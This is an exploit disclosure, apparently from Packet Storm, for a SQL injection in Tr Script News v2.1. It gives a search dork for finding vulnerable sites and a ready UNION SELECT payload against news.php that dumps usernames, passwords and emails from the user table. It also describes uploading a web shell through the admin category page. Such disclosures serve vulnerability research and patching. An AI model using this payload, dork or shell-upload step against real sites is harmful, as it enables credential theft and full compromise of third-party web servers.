TR News version 2.1 suffers from a remote SQL injection vulnerability.
a08d90e45037ca25bc2be57ae78e00af2e7494748364244ce1d49906deb39784########################################################
# #
# Discovered by : His0k4 {Algerian HaCker} #
# #
# Email : His0k4.hlm[at]gmail[dot]com #
# #
# Greetz to: All Dz & muslims HaCkeRs :) #
# #
# Special Greetz:c02,Spym4n,THe-MooRiSH #
# #
########################################################
#
# Script : Tr Script News v2.1
#
# Download script : http://www.easy-script.com/scripts-dl/trscript-21.zip
#
# Dork : inurl:news.php?mode=voir
#
# Vulnerable file : news.php
#
# P.O.C
# http://www.victime.com/[news_path]/news.php?mode=voir&nb=[SQL]
#
# Exemple:
# http://www.victime.com/[news_path]/news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
#
# Admin login: /admin
#
# Note: you can upload a shell from the administrator board by going in this link "/admin/main.php?mode=ajout_cat" and it will be uploaded in "[news_path]/images/icone_cat/shell.php"
#
#############################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed